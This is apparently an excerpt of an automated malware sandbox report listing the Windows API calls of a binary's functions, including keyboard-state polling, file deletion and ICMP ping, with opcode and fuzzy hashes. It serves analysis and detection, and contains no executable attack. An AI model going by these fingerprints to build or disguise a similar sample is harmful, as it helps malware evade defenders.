                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001B7322
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                              • String ID: L6"
                                                                                                                              • API String ID: 1433390588-3669851431
                                                                                                                              • Opcode ID: 455839187f5203731210c3db392cf689e83efac028da20c9092c54be4a887592
                                                                                                                              • Instruction ID: c06cfea5452ee0aed31cc1ef5c7cdc340a858be2d872dc35baf02d4011b88b5f
                                                                                                                              • Opcode Fuzzy Hash: 455839187f5203731210c3db392cf689e83efac028da20c9092c54be4a887592
                                                                                                                              • Instruction Fuzzy Hash: 88317EB590425AABDB059F60EC89AFF7BA9FF48341F144425FD02E61A0E734D960DAA0
APIs
  • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001B843F
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001B8455
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001B8466
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001B8478
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001B8489
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: fa65694fcbbe9a607f1edb581b67a769e8cb49bfb6525266a5c9daddb830bf0b
• Instruction ID: 40cb6a4c6dd1d6cfa747df650716af40eca4bb2ffa03537701966d32b37f4b82
• Opcode Fuzzy Hash: fa65694fcbbe9a607f1edb581b67a769e8cb49bfb6525266a5c9daddb830bf0b
• Instruction Fuzzy Hash: E111C461A6026D79D720E7E1DC4AEFFBA7CEBA2F04F004829B411A60D0DFA05E44C5B1
APIs
• timeGetTime.WINMM ref: 001B809C
  • Part of subcall function 0018E3A5: timeGetTime.WINMM(?,7694B400,001E6163), ref: 0018E3A9
• Sleep.KERNEL32(0000000A), ref: 001B80C8
• EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 001B80EC
• FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 001B810E
• SetActiveWindow.USER32 ref: 001B812D
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001B813B
• SendMessageW.USER32(00000010,00000000,00000000), ref: 001B815A
• Sleep.KERNEL32(000000FA), ref: 001B8165
• IsWindow.USER32 ref: 001B8171
• EndDialog.USER32(00000000), ref: 001B8182
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 1c7a5480b87547f3d572188d2b19d1cddd487bf45d5d046057bb3afd3ec7fed6
• Instruction ID: 858e7d82920993a869e486aaded0e4759b8b92939136dcd95fc592f670f94a43
• Opcode Fuzzy Hash: 1c7a5480b87547f3d572188d2b19d1cddd487bf45d5d046057bb3afd3ec7fed6
• Instruction Fuzzy Hash: 86218EB0210204BFE722AB65FC8DA7A3BAFFB14B89B040115F61182671CF768E45CB21
APIs
  • Part of subcall function 001BC6A0: __time64.LIBCMT ref: 001BC6AA
  • Part of subcall function 001741A7: _fseek.LIBCMT ref: 001741BF
• __wsplitpath.LIBCMT ref: 001BC96F
  • Part of subcall function 0019297D: __wsplitpath_helper.LIBCMT ref: 001929BD
• _wcscpy.LIBCMT ref: 001BC982
• _wcscat.LIBCMT ref: 001BC995
• __wsplitpath.LIBCMT ref: 001BC9BA
• _wcscat.LIBCMT ref: 001BC9D0
• _wcscat.LIBCMT ref: 001BC9E3
  • Part of subcall function 001BC6E4: _memmove.LIBCMT ref: 001BC71D
  • Part of subcall function 001BC6E4: _memmove.LIBCMT ref: 001BC72C
• _wcscmp.LIBCMT ref: 001BC92A
  • Part of subcall function 001BCE59: _wcscmp.LIBCMT ref: 001BCF49
  • Part of subcall function 001BCE59: _wcscmp.LIBCMT ref: 001BCF5C
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001BCB8D
• DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001BCC24
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001BCC3A
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001BCC4B
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001BCC5D
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
• String ID:
• API String ID: 152968663-0
• Opcode ID: 6537d076dfdb223ce8a79025b8a8a334d0af7c7ea412f5fa7a89481aa33a80f3
• Instruction ID: c25690b72217ce43790abe6e0270de9bc882147c836805af7a71ee2a6340c298
• Opcode Fuzzy Hash: 6537d076dfdb223ce8a79025b8a8a334d0af7c7ea412f5fa7a89481aa33a80f3
• Instruction Fuzzy Hash: 82C12EB1900119AEDF15DFA5CC81EEEBBBDEF69310F0040AAF609E6151D7709A84CFA5
APIs
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
• String ID:
• API String ID: 3566271842-0
• Opcode ID: df43cf1a87a530368e83b0f667970840fbb65e8f23c62b2b1af0b1209d07677b
• Instruction ID: 805d09d6a4d3116121f2c71dc2c42e2c2c44c26ec7cfcc440e2d004e578e9c1d
• Opcode Fuzzy Hash: df43cf1a87a530368e83b0f667970840fbb65e8f23c62b2b1af0b1209d07677b
• Instruction Fuzzy Hash: 13711D75A00219EFDB15DFA4D888EDEB7B9EF58314F048099E919AB251DB30EE40CF90
APIs
• GetKeyboardState.USER32(?), ref: 001B3908
• SetKeyboardState.USER32(?), ref: 001B3973
• GetAsyncKeyState.USER32(000000A0), ref: 001B3993
• GetKeyState.USER32(000000A0), ref: 001B39AA
• GetAsyncKeyState.USER32(000000A1), ref: 001B39D9
• GetKeyState.USER32(000000A1), ref: 001B39EA
• GetAsyncKeyState.USER32(00000011), ref: 001B3A16
• GetKeyState.USER32(00000011), ref: 001B3A24
• GetAsyncKeyState.USER32(00000012), ref: 001B3A4D
• GetKeyState.USER32(00000012), ref: 001B3A5B
• GetAsyncKeyState.USER32(0000005B), ref: 001B3A84
• GetKeyState.USER32(0000005B), ref: 001B3A92
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 541375521-0
                                                                                                                              • Opcode ID: 97abc8e07446f214e7b7b90d2e9330d1f3088114ff0ecb1f59e8b5f15f88c2bd
                                                                                                                              • Instruction ID: fdb7be33248b7dd91eb89b9344ac431c4e662509111aa56a618cd425c007b4da
                                                                                                                              • Opcode Fuzzy Hash: 97abc8e07446f214e7b7b90d2e9330d1f3088114ff0ecb1f59e8b5f15f88c2bd
                                                                                                                              • Instruction Fuzzy Hash: 3351F720A0878429FB35EBB488117EABFB45F11740F48858DD5D29B1C3DB54AB9CC762
APIs
• GetDlgItem.USER32(?,00000001), ref: 001AFB19
• GetWindowRect.USER32(00000000,?), ref: 001AFB2B
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 001AFB89
• GetDlgItem.USER32(?,00000002), ref: 001AFB94
• GetWindowRect.USER32(00000000,?), ref: 001AFBA6
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 001AFBFC
• GetDlgItem.USER32(?,000003E9), ref: 001AFC0A
• GetWindowRect.USER32(00000000,?), ref: 001AFC1B
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 001AFC5E
• GetDlgItem.USER32(?,000003EA), ref: 001AFC6C
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001AFC89
• InvalidateRect.USER32(?,00000000,00000001), ref: 001AFC96
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 075220b756c3f4184b4a42ea2b58d1b326ffaefa82112515684dde9e6e82f696
• Instruction ID: 2d26b8f73ade3b8d1778d71d09093ac203a3585068557c8aaa83cd19e8303e9a
• Opcode Fuzzy Hash: 075220b756c3f4184b4a42ea2b58d1b326ffaefa82112515684dde9e6e82f696
• Instruction Fuzzy Hash: 4B512DB5B00209AFDB18CFA9DD95ABEBBBAEB88310F14812DB915D7690D7709D41CB10
APIs
  • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
• GetSysColor.USER32(0000000F), ref: 0018B067
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: cf8551bb02aedac9088d0ac2036bfb1363162636d816f7ba4de5ca3f1934c0b2
• Instruction ID: da4bfd1b31d3aca414334a0d940b72ef7ab72acebaf8af61154f5f8c196e4ffd
• Opcode Fuzzy Hash: cf8551bb02aedac9088d0ac2036bfb1363162636d816f7ba4de5ca3f1934c0b2
• Instruction Fuzzy Hash: 4F41A131108544AFDB246F38EC88BBA3BB6AB06731F184265FD758A1E1D7318D81DF21
APIs
Similarity
• API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
• String ID:
• API String ID: 136442275-0
• Opcode ID: 09c4386dd206ff8339d6739f8534fe8a56871d2e68c3f9c11a0253984e520e37
• Instruction ID: 60e9d8e6cb79116ad828ad17caf42a72dd71e6916e3a163bf2e11e486bd3813b
• Opcode Fuzzy Hash: 09c4386dd206ff8339d6739f8534fe8a56871d2e68c3f9c11a0253984e520e37
• Instruction Fuzzy Hash: B041FFB290412CAADF25EB50CC55EDE73BCBB58314F1041E6F519A2091EB71ABD4CF60
APIs
• __swprintf.LIBCMT ref: 001784E5
• __itow.LIBCMT ref: 00178519
  • Part of subcall function 00192177: _xtow@16.LIBCMT ref: 00192198
Strings
Similarity
• API ID: __itow__swprintf_xtow@16
• String ID: %.15g$0x%p$False$True
• API String ID: 1502193981-2263619337
• Opcode ID: 4c96b6c08b423d88c29a59466a6f87c5de374293ba94a9eb2397decd0a60af87
• Instruction ID: 6093cd0a84a367e48842dd7f03b9b93f83512225786b9e81aa65a034c9f38602
• Opcode Fuzzy Hash: 4c96b6c08b423d88c29a59466a6f87c5de374293ba94a9eb2397decd0a60af87
• Instruction Fuzzy Hash: AA412431604A05ABDF24DB38D845F6A77FABF18304F24846EE44AC7191EB71DA81CB10
APIs
• _memset.LIBCMT ref: 00195CCA
  • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
• __gmtime64_s.LIBCMT ref: 00195D63
• __gmtime64_s.LIBCMT ref: 00195D99
• __gmtime64_s.LIBCMT ref: 00195DB6
• __allrem.LIBCMT ref: 00195E0C
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00195E28
• __allrem.LIBCMT ref: 00195E3F
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00195E5D
• __allrem.LIBCMT ref: 00195E74
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00195E92
• __invoke_watson.LIBCMT ref: 00195F03
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
• Instruction ID: ee742707be1f715b9ef007aeff11b5f94958bf4421407485eaa39000231a9d54
• Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
• Instruction Fuzzy Hash: E9711A75A01B16ABDF159F7DCC41BAAB3AAAF21724F14413AF814F7681E770DE408B90
APIs
• _memset.LIBCMT ref: 001B5816
• GetMenuItemInfoW.USER32(002318F0,000000FF,00000000,00000030), ref: 001B5877
• SetMenuItemInfoW.USER32(002318F0,00000004,00000000,00000030), ref: 001B58AD
• Sleep.KERNEL32(000001F4), ref: 001B58BF
• GetMenuItemCount.USER32(?), ref: 001B5903
• GetMenuItemID.USER32(?,00000000), ref: 001B591F
• GetMenuItemID.USER32(?,-00000001), ref: 001B5949
• GetMenuItemID.USER32(?,?), ref: 001B598E
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001B59D4
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B59E8
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B5A09
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                              • String ID:
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001D9AA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001D9AA8
• GetWindowLongW.USER32(?,000000F0), ref: 001D9ACC
• _memset.LIBCMT ref: 001D9ADD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001D9AEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001D9B67
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
APIs
• GetKeyboardState.USER32(?), ref: 001B3591
• GetAsyncKeyState.USER32(000000A0), ref: 001B3612
• GetKeyState.USER32(000000A0), ref: 001B362D
• GetAsyncKeyState.USER32(000000A1), ref: 001B3647
• GetKeyState.USER32(000000A1), ref: 001B365C
• GetAsyncKeyState.USER32(00000011), ref: 001B3674
• GetKeyState.USER32(00000011), ref: 001B3686
• GetAsyncKeyState.USER32(00000012), ref: 001B369E
• GetKeyState.USER32(00000012), ref: 001B36B0
• GetAsyncKeyState.USER32(0000005B), ref: 001B36C8
• GetKeyState.USER32(0000005B), ref: 001B36DA
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 001AA2AA
• SafeArrayAllocData.OLEAUT32(?), ref: 001AA2F5
• VariantInit.OLEAUT32(?), ref: 001AA307
• SafeArrayAccessData.OLEAUT32(?,?), ref: 001AA327
• VariantCopy.OLEAUT32(?,?), ref: 001AA36A
• SafeArrayUnaccessData.OLEAUT32(?), ref: 001AA37E
• VariantClear.OLEAUT32(?), ref: 001AA393
• SafeArrayDestroyData.OLEAUT32(?), ref: 001AA3A0
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001AA3A9
• VariantClear.OLEAUT32(?), ref: 001AA3BB
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001AA3C6
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
APIs
  • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
  • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
• CoInitialize.OLE32 ref: 001CB298
• CoUninitialize.COMBASE ref: 001CB2A3
• CoCreateInstance.COMBASE(?,00000000,00000017,001FD8FC,?), ref: 001CB303
• IIDFromString.COMBASE(?,?), ref: 001CB376
• VariantInit.OLEAUT32(?), ref: 001CB410
• VariantClear.OLEAUT32(?), ref: 001CB471
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
APIs
• WSAStartup.WS2_32(00000101,?), ref: 001C86F5
• inet_addr.WS2_32(?), ref: 001C873A
• gethostbyname.WS2_32(?), ref: 001C8746
• IcmpCreateFile.IPHLPAPI ref: 001C8754
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001C87C4
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001C87DA
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 001C884F
• WSACleanup.WS2_32 ref: 001C8855
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
APIs
• _memset.LIBCMT ref: 001D9C68
• CreateMenu.USER32 ref: 001D9C83
• SetMenu.USER32(?,00000000), ref: 001D9C92
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001D9D1F
• IsMenu.USER32(?), ref: 001D9D35
• CreatePopupMenu.USER32 ref: 001D9D3F
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001D9D70
• DrawMenuBar.USER32 ref: 001D9D7E
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 176399719-4108050209
                                                                                                                              • Opcode ID: f9a1d350a72342317418675575727eb0aa6b1d720f3cf569ce9530f2f24dbea6
                                                                                                                              • Instruction ID: 496bdf5838974c429b6a536e70bd667e5b50c142d075778fe1d916b7749b674b
                                                                                                                              • Opcode Fuzzy Hash: f9a1d350a72342317418675575727eb0aa6b1d720f3cf569ce9530f2f24dbea6
                                                                                                                              • Instruction Fuzzy Hash: B9414B75A00209EFDB14EFA4E884BEA7BF6FF49314F144029E9499B361D734A950DF60
APIs
• SetErrorMode.KERNEL32(00000001), ref: 001BEC1E
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001BEC94
• GetLastError.KERNEL32 ref: 001BEC9E
• SetErrorMode.KERNEL32(00000000,READY), ref: 001BED0B
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: 198c419fb55efd6b6b6206bb0f2203f2ee86a37ab9d797efbf3dba13466ce201
• Instruction ID: e3d512263f30cb60249c75d52a12cf89c6088b7e0328468503ea88bb14c23c57
• Opcode Fuzzy Hash: 198c419fb55efd6b6b6206bb0f2203f2ee86a37ab9d797efbf3dba13466ce201
• Instruction Fuzzy Hash: 8C31CF35A00209AFC705EFA4D949AFEBBF8FF54710F148026F506EB291DB719A41CB91
APIs
  • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001AC782
• GetDlgCtrlID.USER32 ref: 001AC78D
• GetParent.USER32 ref: 001AC7A9
• SendMessageW.USER32(00000000,?,00000111,?), ref: 001AC7AC
• GetDlgCtrlID.USER32(?), ref: 001AC7B5
• GetParent.USER32(?), ref: 001AC7D1
• SendMessageW.USER32(00000000,?,?,00000111), ref: 001AC7D4
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_memmove
• String ID: ComboBox$ListBox
• API String ID: 313823418-1403004172
• Opcode ID: 0045c84aaa019ba87eed728a4d6cd4f4a9d51d6ad662ed33a856878cb4d42f12
• Instruction ID: dc0dc9c4e2145839186571f74be3ec0c0d65f466a7c4da1d72a993a82f7b413b
• Opcode Fuzzy Hash: 0045c84aaa019ba87eed728a4d6cd4f4a9d51d6ad662ed33a856878cb4d42f12
• Instruction Fuzzy Hash: 3B21DEB4900208BBCF05ABA4CC82EBEB7BAAB56310F104115F522D72D1DB745859EE60
APIs
  • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001AC869
• GetDlgCtrlID.USER32 ref: 001AC874
• GetParent.USER32 ref: 001AC890
• SendMessageW.USER32(00000000,?,00000111,?), ref: 001AC893
• GetDlgCtrlID.USER32(?), ref: 001AC89C
• GetParent.USER32(?), ref: 001AC8B8
• SendMessageW.USER32(00000000,?,?,00000111), ref: 001AC8BB
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: MessageSend$CtrlParent$_memmove
• String ID: ComboBox$ListBox
• API String ID: 313823418-1403004172
• Opcode ID: a9e7f406bc0895feb58875ee2d25e26c48ee693c27134842657c0e83f469bcb4
• Instruction ID: fe18a6720671ac42f8e44766e532b43afbb244205bd41331e9a53528eb573a38
• Opcode Fuzzy Hash: a9e7f406bc0895feb58875ee2d25e26c48ee693c27134842657c0e83f469bcb4
• Instruction Fuzzy Hash: C821D0B5A00208BBDF04EBA4CC86EFEBBBAEF56300F104015F511E7191DB799859EB60
APIs
• GetParent.USER32 ref: 001AC8D9
• GetClassNameW.USER32(00000000,?,00000100), ref: 001AC8EE
• _wcscmp.LIBCMT ref: 001AC900
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001AC97B
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
• Opcode ID: a5cf80964daeaaafb95a79b8ff06bdf3df90b7d12b3f26b7fc38d5540382b9ff
• Instruction ID: 55234841a41531cb3701e16daea90891cfce6dd33b83d5379c910c4e85f21825
• Opcode Fuzzy Hash: a5cf80964daeaaafb95a79b8ff06bdf3df90b7d12b3f26b7fc38d5540382b9ff
• Instruction Fuzzy Hash: 9511E97F648313F9FE052A34EC0ADB777EDDB17768B200012F901E90D2FBA269558594
APIs
• SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 001BB137
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
